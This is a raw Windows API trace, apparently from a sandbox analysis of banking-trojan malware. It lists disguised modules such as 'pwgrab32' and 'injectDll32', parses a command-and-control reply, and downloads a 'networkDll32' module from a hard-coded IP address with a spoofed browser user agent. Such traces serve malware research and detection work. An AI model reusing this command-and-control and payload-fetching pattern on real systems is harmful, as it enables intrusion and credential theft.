	[0211.022] FindFirstFileW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\*.*", lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x260ab240, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x60507b60, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x60507b60, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x22b6ac0
	[0211.022] FindNextFileW (in: hFindFile=0x22b6ac0, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x260ab240, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x60507b60, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x60507b60, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0211.022] FindNextFileW (in: hFindFile=0x22b6ac0, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5992b680, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x5992b680, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x599517e0, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x90bc0, dwReserved0=0x0, dwReserved1=0x0, cFileName="injectDll32", cAlternateFileName="INJECT~1")) returned 1
	[0211.022] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff858
	[0211.022] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x26b5ac8
	[0211.022] FindNextFileW (in: hFindFile=0x22b6ac0, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5b9e6500, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x5ceba580, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x5ceba580, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="injectDll32_configs", cAlternateFileName="INJECT~2")) returned 1
	[0211.022] FindNextFileW (in: hFindFile=0x22b6ac0, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5edac380, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x5edac380, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x5ee1e7a0, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x111360, dwReserved0=0x0, dwReserved1=0x0, cFileName="pwgrab32", cAlternateFileName="")) returned 1
	[0211.022] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ff858, Size=0x10) returned 0x22ff900
	[0211.022] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x26b5ce0
	[0211.022] FindNextFileW (in: hFindFile=0x22b6ac0, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x60507b60, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x60507b60, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x60507b60, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pwgrab32_configs", cAlternateFileName="PWGRAB~1")) returned 1
	[0211.022] FindNextFileW (in: hFindFile=0x22b6ac0, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4554a520, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x4554a520, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x46215b60, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x40b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="systeminfo32", cAlternateFileName="SYSTEM~1")) returned 1
	[0211.022] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ff900, Size=0x10) returned 0x22ff858
	[0211.022] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x24d3b0
	[0211.022] FindNextFileW (in: hFindFile=0x22b6ac0, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4554a520, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x4554a520, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x46215b60, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x40b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="systeminfo32", cAlternateFileName="SYSTEM~1")) returned 0
	[0211.022] GetLastError () returned 0x12
	[0211.022] FindClose (in: hFindFile=0x22b6ac0 | out: hFindFile=0x22b6ac0) returned 1
	[0211.022] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32") returned="injectDll32"
	[0211.022] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x24d5c8
	[0211.022] GetFullPathNameW (in: lpFileName="Data\\injectDll32", nBufferLength=0x105, lpBuffer=0x24d5c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32", lpFilePart=0x0) returned 0x41
	[0211.022] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\injectdll32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x57c
	[0211.023] GetFileTime (in: hFile=0x57c, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x5992b680, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x5992b680, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x599517e0, dwHighDateTime=0x1d50a6a)) returned 1
	[0211.023] CloseHandle (hObject=0x57c) returned 1
	[0211.023] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x666a0160, dwHighDateTime=0x1d50a6a)) 
	[0211.023] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x24d5c8) returned 1
	[0211.023] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\pwgrab32") returned="pwgrab32"
	[0211.023] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x24d5c8
	[0211.023] GetFullPathNameW (in: lpFileName="Data\\pwgrab32", nBufferLength=0x105, lpBuffer=0x24d5c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\pwgrab32", lpFilePart=0x0) returned 0x3e
	[0211.023] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\pwgrab32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\pwgrab32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x57c
	[0211.023] GetFileTime (in: hFile=0x57c, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x5edac380, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x5edac380, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x5ee1e7a0, dwHighDateTime=0x1d50a6a)) returned 1
	[0211.023] CloseHandle (hObject=0x57c) returned 1
	[0211.023] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x666a0160, dwHighDateTime=0x1d50a6a)) 
	[0211.023] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x24d5c8) returned 1
	[0211.023] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\systeminfo32") returned="systeminfo32"
	[0211.023] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x24d5c8
	[0211.023] GetFullPathNameW (in: lpFileName="Data\\systeminfo32", nBufferLength=0x105, lpBuffer=0x24d5c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\systeminfo32", lpFilePart=0x0) returned 0x42
	[0211.023] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\systeminfo32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\systeminfo32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x57c
	[0211.023] GetFileTime (in: hFile=0x57c, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x4554a520, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x4554a520, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x46215b60, dwHighDateTime=0x1d50a6a)) returned 1
	[0211.023] CloseHandle (hObject=0x57c) returned 1
	[0211.024] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x666a0160, dwHighDateTime=0x1d50a6a)) 
	[0211.024] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x24d5c8) returned 1
	[0211.024] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x24d3b0) returned 1
	[0211.024] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26b5ce0) returned 1
	[0211.024] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26b5ac8) returned 1
	[0211.024] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff858) returned 1
	[0211.024] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x1e4538) returned 1
	[0211.024] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a6260
	[0211.024] WinHttpCloseHandle (hInternet=0x24a3b8) returned 1
	[0211.024] WinHttpSetTimeouts (hInternet=0x1f2598, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
	[0211.024] WinHttpOpenRequest (hConnect=0x22c4dc0, pwszVerb="GET", pwszObjectName="/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/1/o6To5Qk4Ro7Qk1HcvBXn7S/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x24a3b8
	[0211.024] WinHttpSetOption (hInternet=0x24a3b8, dwOption=0x1f, lpBuffer=0x128bf0, dwBufferLength=0x4) returned 1
	[0211.024] WinHttpSendRequest (hRequest=0x24a3b8, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1
	[0211.644] WinHttpReceiveResponse (hRequest=0x24a3b8, lpReserved=0x0) returned 1
	[0211.644] WinHttpQueryHeaders (in: hRequest=0x24a3b8, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x128be0, lpdwBufferLength=0x128bdc, lpdwIndex=0x0 | out: lpBuffer=0x128be0*, lpdwBufferLength=0x128bdc*=0x4, lpdwIndex=0x0) returned 1
	[0211.644] WinHttpQueryDataAvailable (in: hRequest=0x24a3b8, lpdwNumberOfBytesAvailable=0x128be4 | out: lpdwNumberOfBytesAvailable=0x128be4*=0x7b) returned 1
	[0211.644] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x2255b0
	[0211.644] WinHttpReadData (in: hRequest=0x24a3b8, lpBuffer=0x2255b0, dwNumberOfBytesToRead=0x7b, lpdwNumberOfBytesRead=0x128bdc | out: lpBuffer=0x2255b0*, lpdwNumberOfBytesRead=0x128bdc*=0x7b) returned 1
	[0211.644] WinHttpQueryDataAvailable (in: hRequest=0x24a3b8, lpdwNumberOfBytesAvailable=0x128be4 | out: lpdwNumberOfBytesAvailable=0x128be4*=0x0) returned 1
	[0211.645] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2255b0, cbMultiByte=123, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 123
	[0211.645] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x100) returned 0x2311108
	[0211.645] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2255b0, cbMultiByte=123, lpWideCharStr=0x2311108, cchWideChar=123 | out: lpWideCharStr="/62/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/o6To5Qk4Ro7Qk1HcvBXn7S/68975813/\r\nnetworkDll start\r\n1234567890") returned 123
	[0211.645] StrStrIW (lpFirst="/62/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/o6To5Qk4Ro7Qk1HcvBXn7S/68975813/\r\nnetworkDll start\r\n1234567890", lpSrch="/") returned="/62/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/o6To5Qk4Ro7Qk1HcvBXn7S/68975813/\r\nnetworkDll start\r\n1234567890"
	[0211.645] StrStrIW (lpFirst="62/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/o6To5Qk4Ro7Qk1HcvBXn7S/68975813/\r\nnetworkDll start\r\n1234567890", lpSrch="/") returned="/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/o6To5Qk4Ro7Qk1HcvBXn7S/68975813/\r\nnetworkDll start\r\n1234567890"
	[0211.645] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff858
	[0211.645] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff900
	[0211.645] lstrcpynW (in: lpString1=0x22ff900, lpString2="62/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/o6To5Qk4Ro7Qk1HcvBXn7S/68975813/\r\nnetworkDll start\r\n1234567890", iMaxLength=3 | out: lpString1="62") returned="62"
	[0211.645] StrStrIW (lpFirst="tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/o6To5Qk4Ro7Qk1HcvBXn7S/68975813/\r\nnetworkDll start\r\n1234567890", lpSrch="/") returned="/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/o6To5Qk4Ro7Qk1HcvBXn7S/68975813/\r\nnetworkDll start\r\n1234567890"
	[0211.645] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ff858, Size=0x10) returned 0x22ff918
	[0211.645] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff858
	[0211.645] lstrcpynW (in: lpString1=0x22ff858, lpString2="tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/o6To5Qk4Ro7Qk1HcvBXn7S/68975813/\r\nnetworkDll start\r\n1234567890", iMaxLength=7 | out: lpString1="tot478") returned="tot478"
	[0211.645] StrStrIW (lpFirst="ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/o6To5Qk4Ro7Qk1HcvBXn7S/68975813/\r\nnetworkDll start\r\n1234567890", lpSrch="/") returned="/o6To5Qk4Ro7Qk1HcvBXn7S/68975813/\r\nnetworkDll start\r\n1234567890"
	[0211.646] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ff918, Size=0x10) returned 0x22ff8e8
	[0211.646] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x70) returned 0x22c82f0
	[0211.646] lstrcpynW (in: lpString1=0x22c82f0, lpString2="ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/o6To5Qk4Ro7Qk1HcvBXn7S/68975813/\r\nnetworkDll start\r\n1234567890", iMaxLength=50 | out: lpString1="ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611") returned="ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611"
	[0211.646] StrStrIW (lpFirst="o6To5Qk4Ro7Qk1HcvBXn7S/68975813/\r\nnetworkDll start\r\n1234567890", lpSrch="/") returned="/68975813/\r\nnetworkDll start\r\n1234567890"
	[0211.646] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ff8e8, Size=0x10) returned 0x22ff918
	[0211.646] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a5b60
	[0211.646] lstrcpynW (in: lpString1=0x22a5b60, lpString2="o6To5Qk4Ro7Qk1HcvBXn7S/68975813/\r\nnetworkDll start\r\n1234567890", iMaxLength=23 | out: lpString1="o6To5Qk4Ro7Qk1HcvBXn7S") returned="o6To5Qk4Ro7Qk1HcvBXn7S"
	[0211.646] StrStrIW (lpFirst="68975813/\r\nnetworkDll start\r\n1234567890", lpSrch="/") returned="/\r\nnetworkDll start\r\n1234567890"
	[0211.647] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ff918, Size=0x20) returned 0x2732e18
	[0211.647] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27330c0
	[0211.647] lstrcpynW (in: lpString1=0x27330c0, lpString2="68975813/\r\nnetworkDll start\r\n1234567890", iMaxLength=9 | out: lpString1="68975813") returned="68975813"
	[0211.647] StrStrIW (lpFirst="\r\nnetworkDll start\r\n1234567890", lpSrch="/") returned 0x0
	[0211.647] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2732e18, Size=0x20) returned 0x27330e8
	[0211.647] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x40) returned 0x1e4538
	[0211.647] lstrcpynW (in: lpString1=0x1e4538, lpString2="\r\nnetworkDll start\r\n1234567890", iMaxLength=31 | out: lpString1="\r\nnetworkDll start\r\n1234567890") returned="\r\nnetworkDll start\r\n1234567890"
	[0211.647] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a6228
	[0211.647] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a5bd0) returned 1
	[0211.647] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad318) returned 1
	[0211.647] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a79a8) returned 1
	[0211.647] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a6298) returned 1
	[0211.647] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a5f50) returned 1
	[0211.647] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x23078e8) returned 1
	[0211.647] StrStrIW (lpFirst="\r\nnetworkDll start\r\n1234567890", lpSrch="\r\n") returned="\r\nnetworkDll start\r\n1234567890"
	[0211.647] StrStrIW (lpFirst="networkDll start\r\n1234567890", lpSrch="\r\n") returned="\r\n1234567890"
	[0211.648] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad318
	[0211.648] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a5f50
	[0211.648] lstrcpynW (in: lpString1=0x22a5f50, lpString2="networkDll start\r\n1234567890", iMaxLength=17 | out: lpString1="networkDll start") returned="networkDll start"
	[0211.648] StrStrIW (lpFirst="1234567890", lpSrch="\r\n") returned 0x0
	[0211.648] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ad318, Size=0x10) returned 0x22ad2d0
	[0211.648] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23078e8
	[0211.648] lstrcpynW (in: lpString1=0x23078e8, lpString2="1234567890", iMaxLength=11 | out: lpString1="1234567890") returned="1234567890"
	[0211.648] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2311108) returned 1
	[0211.648] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27330e8) returned 1
	[0211.648] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad2d0) returned 1
	[0211.648] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2255b0) returned 1
	[0211.648] lstrcmpW (lpString1="68975813", lpString2="IWNZKYJXHWGTGQGXN") returned -1
	[0211.648] StrStrIW (lpFirst="networkDll start", lpSrch=" ") returned=" start"
	[0211.648] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad2d0
	[0211.648] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27330e8
	[0211.648] lstrcpynW (in: lpString1=0x27330e8, lpString2="networkDll start", iMaxLength=11 | out: lpString1="networkDll") returned="networkDll"
	[0211.648] StrStrIW (lpFirst="start", lpSrch=" ") returned 0x0
	[0211.648] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ad2d0, Size=0x10) returned 0x22ad318
	[0211.649] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad2d0
	[0211.649] lstrcpynW (in: lpString1=0x22ad2d0, lpString2="start", iMaxLength=6 | out: lpString1="start") returned="start"
	[0211.649] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="start", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6
	[0211.649] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad378
	[0211.649] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="start", cchWideChar=-1, lpMultiByteStr=0x22ad378, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="start", lpUsedDefaultChar=0x0) returned 6
	[0211.649] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2732e18
	[0211.649] lstrcmpiW (lpString1="injectDll32", lpString2="networkDll32") returned -1
	[0211.649] lstrcmpiW (lpString1="pwgrab32", lpString2="networkDll32") returned 1
	[0211.649] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2732e18) returned 1
	[0211.649] lstrcmpiW (lpString1="start", lpString2="start") returned 0
	[0211.649] lstrcmpiW (lpString1="start", lpString2="release") returned 1
	[0211.649] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2732e18
	[0211.649] lstrcmpiW (lpString1="injectDll32", lpString2="networkDll32") returned -1
	[0211.649] lstrcmpiW (lpString1="pwgrab32", lpString2="networkDll32") returned 1
	[0211.649] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2732e18) returned 1
	[0211.649] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2732e18
	[0211.649] WinHttpOpen (pszAgentW="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x22c56d0
	[0211.649] WinHttpConnect (hSession=0x22c56d0, pswzServerName="37.44.212.204", nServerPort=0x1bf, dwReserved=0x0) returned 0x22c5160
	[0211.649] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2733160
	[0211.649] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x40) returned 0x22c7158
	[0211.650] WinHttpSetTimeouts (hInternet=0x22c56d0, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
	[0211.650] WinHttpOpenRequest (hConnect=0x22c5160, pwszVerb="GET", pwszObjectName="/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/5/networkDll32/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x22c98d8
	[0211.650] WinHttpSetOption (hInternet=0x22c98d8, dwOption=0x1f, lpBuffer=0x128338, dwBufferLength=0x4) returned 1
	[0211.650] WinHttpSendRequest (hRequest=0x22c98d8, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1
	[0214.432] WinHttpReceiveResponse (hRequest=0x22c98d8, lpReserved=0x0) returned 1
	[0214.432] WinHttpQueryHeaders (in: hRequest=0x22c98d8, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x128328, lpdwBufferLength=0x128324, lpdwIndex=0x0 | out: lpBuffer=0x128328*, lpdwBufferLength=0x128324*=0x4, lpdwIndex=0x0) returned 1
	[0214.432] WinHttpQueryDataAvailable (in: hRequest=0x22c98d8, lpdwNumberOfBytesAvailable=0x12832c | out: lpdwNumberOfBytesAvailable=0x12832c*=0xee5) returned 1
	[0214.433] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0xef0) returned 0x22efc68
	[0214.433] WinHttpReadData (in: hRequest=0x22c98d8, lpBuffer=0x22efc68, dwNumberOfBytesToRead=0xee5, lpdwNumberOfBytesRead=0x128324 | out: lpBuffer=0x22efc68*, lpdwNumberOfBytesRead=0x128324*=0xee5) returned 1
	[0214.433] WinHttpQueryDataAvailable (in: hRequest=0x22c98d8, lpdwNumberOfBytesAvailable=0x12832c | out: lpdwNumberOfBytesAvailable=0x12832c*=0x2000) returned 1
	[0214.433] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22efc68, Size=0x2ef0) returned 0x26a80a0
	[0214.433] WinHttpReadData (in: hRequest=0x22c98d8, lpBuffer=0x26a8f85, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x128324 | out: lpBuffer=0x26a8f85*, lpdwNumberOfBytesRead=0x128324*=0x2000) returned 1
	[0214.433] WinHttpQueryDataAvailable (in: hRequest=0x22c98d8, lpdwNumberOfBytesAvailable=0x12832c | out: lpdwNumberOfBytesAvailable=0x12832c*=0x101c) returned 1
	[0214.433] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x26a80a0, Size=0x3f10) returned 0x26a80a0
	[0214.433] WinHttpReadData (in: hRequest=0x22c98d8, lpBuffer=0x26aaf85, dwNumberOfBytesToRead=0x101c, lpdwNumberOfBytesRead=0x128324 | out: lpBuffer=0x26aaf85*, lpdwNumberOfBytesRead=0x128324*=0x101c) returned 1
	[0214.433] WinHttpQueryDataAvailable (in: hRequest=0x22c98d8, lpdwNumberOfBytesAvailable=0x12832c | out: lpdwNumberOfBytesAvailable=0x12832c*=0xbaf) returned 1
	[0214.434] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x26a80a0, Size=0x4ab0) returned 0x26a80a0
